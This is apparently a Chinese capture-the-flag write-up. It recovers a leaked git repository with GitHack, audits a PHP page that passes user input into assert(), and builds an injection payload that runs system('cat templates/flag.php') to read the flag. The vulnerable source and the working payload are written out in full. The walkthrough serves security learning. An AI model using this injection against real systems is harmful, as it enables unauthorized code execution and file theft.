做字的網(wǎng)站個(gè)人友情鏈接推廣
根據(jù)題目提示考慮是git庫(kù)泄露
這里在地址欄后加.git也可以驗(yàn)證是git庫(kù)泄露
使用GitHack工具對(duì)git庫(kù)進(jìn)行恢復(fù)重建
?
在templates目錄下存在flag.php文件,但里面并沒(méi)有flag
有內(nèi)容的只有主目錄下的index.php
?
index.php源碼:
<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>
<!DOCTYPE html>
<html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>My PHP Website</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" /></head><body><nav class="navbar navbar-inverse navbar-fixed-top"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="navbar-brand" href="#">Project name</a></div><div id="navbar" class="collapse navbar-collapse"><ul class="nav navbar-nav"><li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li><li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li><li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li><!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> --></ul></div></div></nav><div class="container" style="margin-top: 50px"><?phprequire_once $file;?></div><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" /><script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" /></body>
</html>提取需要審計(jì)的PHP代碼
代碼審計(jì):
<?phpif (isset($_GET['page'])) { //判斷$page是否存在$page = $_GET['page']; //存在就以get方法取值
} else {$page = "home"; //不存在就將"home"賦值給新建$page
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
//assert函數(shù)返回值如果不為true則執(zhí)行die命令則PHP腳本終止運(yùn)行
//所以我們可以構(gòu)造一個(gè)$file使其直接執(zhí)行系統(tǒng)命令并加上注釋符把判斷".."的部分注釋掉并即可// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
//判斷$file文件是否存在,不存在直接終止腳本?>
其中有一串關(guān)鍵代碼:$file = "templates/" . $page . ".php";
我們通過(guò)前面的GitHack已知悉flag.php文件就在templates目錄下
所以我們構(gòu)造payload的時(shí)候使$page有cat flag.php命令就行
重點(diǎn):assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
首先使strpos函數(shù)閉合,利用函數(shù)結(jié)構(gòu)strpost(',那么$file的前半部分應(yīng)該是:')
后面接上命令: or system('cat templates/flag.php'),再接上注釋符://
如此這般,該條代碼最后執(zhí)行的效果應(yīng)該是:【綠色部分被//注釋】
assert("strpos('') or system('cat templates/flag.php');//', '..') === false") or die("Detected hacking attempt!");
strpost('')參數(shù)為空時(shí)返回false,所以直接執(zhí)行or后面的代碼
最后構(gòu)造payload:URL/?page=') or system('cat templates/flag.php');//
